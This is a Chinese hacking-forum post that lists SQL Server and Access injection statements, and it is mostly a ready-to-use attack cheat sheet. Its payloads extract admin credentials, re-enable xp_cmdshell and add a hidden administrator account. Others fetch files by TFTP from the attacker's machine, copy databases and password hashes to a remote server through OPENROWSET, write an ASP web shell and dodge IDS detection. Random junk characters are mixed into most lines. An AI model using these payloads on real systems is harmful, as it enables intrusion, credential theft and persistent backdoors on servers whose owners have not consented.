找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 SQL注入语句2
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1850|回复: 0
打印 上一主题 下一主题

SQL注入语句2

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:32:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1..判断有无注入点 + c! `0 ~8 L0 I* c6 x3 E9 b( H; q
; and 1=1 and 1=2
  n: O: ~; B7 y  l8 n# ?  \% G+ G' X4 [6 s& m! q$ [# k2 R7 B

& a3 C+ {, J+ R  Z) ^# Y" p% X  E2.猜表一般的表的名称无非是admin adminuser user pass password 等..
  v2 Z  z  \& h% h9 m3 d; Yand 0<>(select count(*) from *) 7 |% u0 Q: h7 x# K
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 ) [& o( n/ x/ @0 O1 h: {% \) E8 y
$ x6 r6 w5 ?" N# u8 F3 [

% ?# r3 [3 D& w( h3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 & O' U& H+ ~1 Y/ u& D4 l
and 0<(select count(*) from admin)
5 q0 o6 ~/ l( C$ n1 v, band 1<(select count(*) from admin) 2 q3 n9 m2 s) r  e! K2 C4 S
猜列名还有 and (select count(列名) from 表名)>0
8 Y. t+ b* V% d- z. y( R- D7 o* A$ O% O8 ?  }! j
6 {" I% l5 ~' \4 T
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 7 t/ m% z* B; z$ m9 [+ {
and 1=(select count(*) from admin where len(*)>0)--
8 `+ \" w  c* v. K* W/ @3 M1 C& Gand 1=(select count(*) from admin where len(用户字段名称name)>0) 8 I% P$ U$ ~: A
and 1=(select count(*) from admin where len(密码字段名称password)>0)
) ?, V/ G; P. Q; c% }: c
. [* [: [8 z. N4 j8 ^3 f: N6 _4 i( a5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
0 c! T  M3 C& N9 {and 1=(select count(*) from admin where len(*)>0)
( @7 s- S: B6 G; ?2 [' Dand 1=(select count(*) from admin where len(name)>6) 错误
* X1 ], B) G% J0 ]& Y. q  ^! Cand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 6 D! [+ S9 h( k. N. D& }. m( s) o  S
and 1=(select count(*) from admin where len(name)=6) 正确
0 H; y9 L1 d% g# s4 C' ^
0 g/ V+ t3 Y' z3 yand 1=(select count(*) from admin where len(password)>11) 正确 4 }* H# b" \: o1 @6 y. W! C
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
3 k/ O, A) @$ Nand 1=(select count(*) from admin where len(password)=12) 正确
/ c& w! |+ U/ k/ A3 p猜长度还有 and (select top 1 len(username) from admin)>5
0 ^2 v4 D: k3 s$ f4 O$ Q' `0 y$ a
8 U- b% ?) u. n' R) W2 W
8 J! \% f# ~' U4 {! z7 H6.猜解字符 / z  j. p7 V, ^. F. |
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
# }" c* O' F$ `$ F1 q, X3 xand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
: ~; }' S1 o- |/ U就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
; b3 C0 A5 W) R2 g4 l4 H# J0 [8 r2 Z4 j. b
猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
; L: Y) ?1 }' c% v4 X6 Gand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
: V6 y5 G$ o7 I6 P3 ?5 ]1 D! b$ @这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 3 d: n9 m7 o" V+ H  W4 N/ m% l
3 J" T( L  M0 M! ]6 ~3 d
group by users.id having 1=1--
; ?( P) f# _9 o' ngroup by users.id, users.username, users.password, users.privs having 1=1-- $ k! F+ h8 N! b* A! _1 }
; insert into users values( 666, attacker, foobar, 0xffff )-- . w: A% Q+ E' x' H

- V' c1 n7 O' B3 t4 _, j6 c+ j# J( h+ FUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
. I, B  l/ {% D6 N% S/ o/ R% U: a; t( ~UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- . }8 K: C3 _) C/ ~: a; @
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
, W& ~  T8 S6 H; n4 l/ D% cUNION SELECT TOP 1 login_name FROM logintable-
% i- C  @2 J! d7 O& OUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
% E) T- c) ]7 |# O1 A; N) K: e1 P5 F% y2 Q* f& `
看服务器打的补丁=出错了打了SP4补丁 $ s+ H5 F( H5 G0 i9 B9 N- X
and 1=(select @@VERSION)-- 4 H4 e$ D9 O2 X! K8 D% s

! @! q: G- q* Y/ @看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 7 G- d9 O/ T# D) h0 ?( n
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- 9 }, Z7 `3 \0 ]$ K; i- d7 x/ T
# T5 A" i: g( r; _; k$ [) N! N) E4 N6 e5 V
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
7 @& x# Q4 M8 z* B7 I3 H6 r1 Jand sa=(SELECT System_user)-- " A2 _4 m+ w6 }+ R/ N
and user_name()=dbo--
3 Q. v8 P  M. u( l; X' [8 nand 0<>(select user_name()--
% c' g+ E: u8 h( ]& f9 i& H! B4 F) x; v) N$ w' r" [
看xp_cmdshell是否删除 6 e1 _, r! Q" J
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
( L( ~% N2 k" H5 \8 v5 k9 S( }6 B& _/ }5 V
xp_cmdshell被删除,恢复,支持绝对路径的恢复
0 o/ S, v0 ?3 v' p5 R* @;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- - O( A" ~  ^! a$ m* O
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 7 c. f8 C. w* ^. M% O

& Q) w6 _% \! |2 {反向PING自己实验 2 o% q" }2 g, E( y4 H( e
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- * v3 ~/ F' |% D* y% d4 Z  x& z, t
$ I- K) C* O) P4 \+ `1 Q# k, o
加帐号
& N& g4 F9 b0 n; R# B;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- ( d- T0 N$ x- w7 S1 \( x4 h
5 @) A6 Y. |* f# B  x0 S  Q
创建一个虚拟目录E盘:
* Z% ]6 N, O' x8 }- j$ k* ~% M;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- ! ^( B  p3 N" p
/ b2 D' Z. a1 I: X# ?% S
访问属性:(配合写入一个webshell)   c! ~- O3 ]& C4 u$ M& t
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse % L: A7 U  ~3 n! F
/ `( w1 I$ N9 x1 o( y- ~0 ^

! F; k( G& T5 K$ O1 `* U4 C/ hMSSQL也可以用联合查询8 f0 a' G: V& B7 N1 n5 {
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
. D" t, l6 p  K% _1 v1 K?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
. I! s6 Y/ p- t) q" k/ W% b$ r" }7 |7 }0 Z
4 |" ~+ H( u: M5 N5 N
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
1 f9 D3 U4 I# p" O7 T* N. m& l% S9 t! \" V/ z7 @
$ O% g- @: A2 t% o) a  W7 o! ^

7 c/ ]" R, k3 d! B& J; `% Z" Z得到WEB路径 + s; o3 U6 e0 o: d* E- a
;create table [dbo].[swap] ([swappass][char](255));-- ' Y% S( @* f: O0 c; z' u
and (select top 1 swappass from swap)=1-- . }- y  j5 q0 j, k. `; c
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- + z0 [9 _. k/ a
;use ku1;-- 8 |0 r* `. X. D0 f1 T
;create table cmd (str image);-- 建立image类型的表cmd 9 j0 Q3 c# R' t0 a
3 m/ i# f; h( i
存在xp_cmdshell的测试过程: " k' D( y$ }2 p" @
;exec master..xp_cmdshell dir ) ^0 M# p3 S. M8 A6 E
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
) i* k$ _! s  X9 E% K;exec master.dbo.sp_password null,jiaoniang$,1866574;--
" V, ?4 y- K8 S1 ~1 ?" d$ L;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
: b) a, {* P0 d! N+ j9 _2 Z;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- 5 a6 u5 ]( Z3 T  ?* E) A2 [
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
; I1 s0 a* j5 s2 U+ B- [exec master..xp_servicecontrol start, schedule 启动服务 % D8 ~* e8 ]% D8 y: |* F
exec master..xp_servicecontrol start, server 0 [; p: ~' w3 z
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
; @1 N; H5 h3 a. c  \" D  O" y- E;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
# h; S: Z: K6 l0 n/ b2 n9 E" F0 Y; O; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 " j. y; z- H5 z- r
4 S, |6 e7 @  u; I: O; h' R( y
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ % L$ g) e" P7 r
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
: N; P' N! e) @;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
; d& j; K7 W/ d/ n3 B如果被限制则可以。 4 S1 [5 d/ n1 D* f3 F! x
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
1 e4 N/ N+ t7 E% P* |6 y& n
9 `! D! y" G' P3 n' \* G查询构造:
6 |' j9 B1 f  ~/ ^. F. Q+ ?SELECT * FROM news WHERE id=... AND topic=... AND ..... $ B$ q9 _6 w3 L" ]% o, }
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
3 v7 ]! s3 P2 r7 B1 B, S- kselect 123;--
% K* H) W8 @0 z# H5 H# d$ d3 }+ T+ y# M;use master;--
- ^% }  Z& u! t5 k: v:a or name like fff%;-- 显示有一个叫ffff的用户哈。 5 q- m% @+ A, Q* X3 I
and 1<>(select count(email) from [user]);--
" B! z* m% [! y6 O3 Y" F;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- ' i( y+ b/ w) u" S1 U2 `! @6 O0 V
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
2 ]% x( D, P7 K1 E6 X' f( @;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- + U! S9 p) o: r9 c/ W* O; O
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
/ @& t: g; a" b7 `5 g) L. a;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- 7 _3 i- G8 ]* I$ D  p) l9 D
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- 7 ^5 [& L6 ]# m1 ~; v
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 6 x$ V- r2 H- c1 V% o5 w) R
通过查看ffff的用户资料可得第一个用表叫ad & {7 @9 u3 t. {$ z
然后根据表名ad得到这个表的ID 得到第二个表的名字
& R$ ?3 G6 L0 P! R5 f# U- `
& V$ u: x) }0 s" n* c" N6 Y7 B; Tinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--   k/ s+ z" T9 A: z+ _
insert into users values( 667,123,123,0xffff)-- - e+ i# _& {" _- ^/ |; K9 d8 o5 x
insert into users values ( 123, admin--, password, 0xffff)-- " d4 V- `2 ?  O6 e5 [, ^8 `
;and user>0
% f8 f# R, m4 m4 R0 \; v;and (select count(*) from sysobjects)>0 . X+ v# R& X2 ^; p8 ~/ N6 v4 q8 }$ A* B8 M
;and (select count(*) from mysysobjects)>0 //为access数据库 + z! g( B! X$ X. K

& b7 A% m" T; C3 z8 l3 t枚举出数据表名 7 E$ p% U) b7 b4 g& B4 z
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- $ v6 ]$ t3 u0 Q
这是将第一个表名更新到aaa的字段处。
6 o" i0 {2 j4 [* Y7 C8 I9 q读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 ( W6 Y* m* w7 g( r) \
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- : G4 I2 `1 V1 R  y' r
然后id=1552 and exists(select * from aaa where aaa>5) ! q/ E# |0 b' [/ k8 p6 X
读出第二个表,一个个的读出,直到没有为止。
# `# J- s# s( C读字段是这样:
* _7 ~' h4 n+ k1 M;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- : S( F7 p2 k0 o' z6 J
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
' p. @  G5 o; M" C& |! c) l;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- ! K* z4 f. }% A' V% p; X9 }
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 ; m) }1 ?$ }: R% a. c. m, a( p

* R- l: O3 b6 e: ^- M! f6 o3 ^# _[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
8 j; X% K  z) M$ T6 j% x- D% h5 {/ Zupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) 8 @. s5 n$ m; z5 g
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] 7 V9 c7 g$ Y8 {% Z8 w

" b% p" \' D2 U% O; M8 i[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
7 s9 D& A3 x( l* F7 }) `: \" ^3 f2 m0 `5 oupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] 7 t& T2 T5 |  [/ B6 {
( X; Z  r0 L3 T: R& L# ]) J
绕过IDS的检测[使用变量]
' R; J! p; U5 u' S( m# f;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ 3 h7 Q( q6 o! B0 p  D
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ / U; F& ^& f( z+ `3 Y4 V

+ E! Z" L: u& C8 k1、 开启远程数据库 / E" d/ I7 h/ ^2 y) g
基本语法
5 f! k5 ?7 W; uselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 ) + G$ p" v6 N  O, Z1 @3 i
参数: (1) OLEDB Provider name : ?' ]2 P5 s7 p6 u2 i
2、 其中连接字符串参数可以是任何端口用来连接,比如 % q( p6 h8 P  U/ E  K4 K( s
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
# P1 ~. Z) j! B9 ?- ?3.复制目标主机的整个数据库insert所有远程表到本地表。
% [1 |% h* X& d" y8 z8 ]
, Q" u. h% ?+ q6 [2 y) t$ K基本语法:
; s9 a0 \2 J2 Einsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 ' w, M# @) _) V
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: / Z& P) U" c1 ~8 G& X
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
6 W% W' E! }5 R7 a7 A( H& F4 minsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) ! f) _/ a7 I( j5 w( F  U
select * from master.dbo.sysdatabases
9 M, H* g5 H. Z( {, A! v0 [+ jinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) + E" q& Z8 `/ h# o! e
select * from user_database.dbo.sysobjects
! c; o; b# ~7 e9 x; W4 J2 uinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
0 S6 V7 n; q0 G! |% p1 Eselect * from user_database.dbo.syscolumns * X* c) N2 a  `, ~' u# V
复制数据库: $ @% O/ T) H0 j2 w" a9 j4 K
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
. ~: F: x7 _0 Sinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 4 I2 v5 z2 ?  ]/ u9 x1 q/ x% B
# B; k9 J& w  \" Z( O
复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
) E: Y; s) B0 L; L0 a4 ainsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
# I: g* J- u+ y' J* [7 h2 E3 u得到hash之后,就可以进行暴力破解。 & ~% K! ]2 f* y5 U9 o9 K
9 p* i) e2 L, ~* ^+ a: [; m2 u
遍历目录的方法: 先创建一个临时表:temp 6 s/ M9 ?. q* N% H! \
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
) Q: \  X7 S, n& b) F* X! B: _;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
( @6 V3 Y3 V- x* \; l;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 - m; m) s" z% \* O
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
9 A0 X+ [% _0 \6 A3 w6 f/ \# ];insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 4 E# v% F8 Y/ n+ c
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
- c* E) L) X0 @+ a;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- * A6 j- l1 X, }. k- J1 Z6 g4 J6 n6 R
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
+ n2 q# B% o& b9 q;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) " ~  [# V; ?9 Q+ x
写入表: ( S( [/ B/ d* O; K, [
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
0 M# q0 ?9 S1 Z+ ]语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
! N) t9 [8 u) v3 e. k2 W/ B语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- 0 h' o! W$ V: b5 D+ H7 q
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
' w* A) a! k2 g  E! }) J( F语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
, y/ ~' t! \8 o2 ]1 C, G语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
8 y; u2 g# J  i& d$ S/ D语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- ; N$ Q+ N+ b6 Y! z- R  T
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- . X. }2 S" X! F% M/ g
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
* T- ?1 C% s/ Y( b5 N0 ^
+ O/ J7 u5 X3 U0 z( G+ p; ?把路径写到表中去:
. ]: v4 T( y% Y# `/ |;create table dirs(paths varchar(100), id int)--
+ c2 ^  p% Y8 ~$ u9 F;insert dirs exec master.dbo.xp_dirtree c:\--
% q( ?  X* G4 C( [1 S" u. vand 0<>(select top 1 paths from dirs)-- / M' f$ f$ l) q. ~& u
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
9 F+ k2 j' k+ N4 P8 ~;create table dirs1(paths varchar(100), id int)-- * g% V/ T4 ^& K3 P8 O  H" E
;insert dirs exec master.dbo.xp_dirtree e:\web-- 4 T0 h4 W" |8 E2 o- M! H
and 0<>(select top 1 paths from dirs1)--
7 ?; \# x8 L2 {- {
$ J* `; E5 i7 ^0 E% N" t( U把数据库备份到网页目录:下载 8 W" n" e! N; ^6 _& `% i
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- 1 s% t& m4 m- h6 S5 t. t
+ V3 [# f4 S% V2 m
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) ' O; v) j/ u& k! E# J  e) A
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
2 I/ D2 N8 _4 |1 z. t% y8 Land 1=(select user_id from USER_LOGIN)
8 \8 t# _7 O5 P, {8 l# Yand 0=(select user from USER_LOGIN where user>1)
! D- F% ~7 n& u% M! l) l- H: @/ m
7 U; p9 _+ m/ b! X7 W-=- wscript.shell example -=- / q) @. R& f5 t6 y+ P2 r8 x/ n
declare @o int
% @( L/ ~8 v9 e& P2 Gexec sp_oacreate wscript.shell, @o out
2 z, @8 `6 y2 V( Y( b, `  iexec sp_oamethod @o, run, NULL, notepad.exe : e/ K. n0 ]' D! o4 Y5 X$ Z
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
4 \  J- y/ H& C2 q. |4 ?# s" i
, Y. [- A0 Z4 z' Mdeclare @o int, @f int, @t int, @ret int * N) r$ z/ z7 T% I' S; M& ^
declare @line varchar(8000) 5 F: v: h, ~% ]( r
exec sp_oacreate scripting.filesystemobject, @o out
7 A- m* w% U, O9 c$ A* a  `: Vexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 / ^* O/ w. _- _% }0 x1 P' m- S6 H! G& M
exec @ret = sp_oamethod @f, readline, @line out ! g' z! [: v: r5 [3 I9 w
while( @ret = 0 ) " T; O5 W% ~) W# c6 N  e) q
begin
6 e8 S( K' A7 u' Z3 l" e8 Pprint @line 6 N4 |% g" @, ^" y
exec @ret = sp_oamethod @f, readline, @line out
% h) B* }7 Q' G/ C4 b3 zend 5 J5 e6 O5 G: S* O* b& d$ X
4 W, f1 J* U+ Z5 v/ N
declare @o int, @f int, @t int, @ret int
8 w( U- i$ v9 a" c& S2 {9 Jexec sp_oacreate scripting.filesystemobject, @o out 0 q5 w" |% R% z0 c+ j4 M1 W9 \
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1 ; z4 V+ Z& N7 j
exec @ret = sp_oamethod @f, writeline, NULL,
8 ^0 P! I) l& N+ K5 f<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
2 |2 G1 W& b0 b9 j" e  l- ^& r* a+ ?6 N9 {
declare @o int, @ret int 1 B, M3 W" ?# h& J! Z9 ~( T
exec sp_oacreate speech.voicetext, @o out - N! }* u: a4 c* X' x. F
exec sp_oamethod @o, register, NULL, foo, bar 5 [. V$ a4 r! x+ ?; U% J  ?4 n) s$ l
exec sp_oasetproperty @o, speed, 150
) ~/ b* \- b4 ^6 }/ o9 e  Gexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 6 D6 h% T( ]% u3 |
waitfor delay 00:00:05 0 U3 V* k$ K8 j1 `1 @0 _

4 G, B0 A* q) g3 v+ C' Z2 d; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
2 _% P; M* ?7 J8 j+ w7 g6 D
$ L5 I0 Z" [& Uxp_dirtree适用权限PUBLIC 2 j$ C- _& I, J2 e; E
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
& M9 j. v. @9 M1 f+ d! Tcreate table dirs(paths varchar(100), id int)
  L* v3 f! g) X建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 5 D7 K# l, E/ t2 F7 H( |3 L
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
* j( A4 p, c6 u1 A, U$ F$ o
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表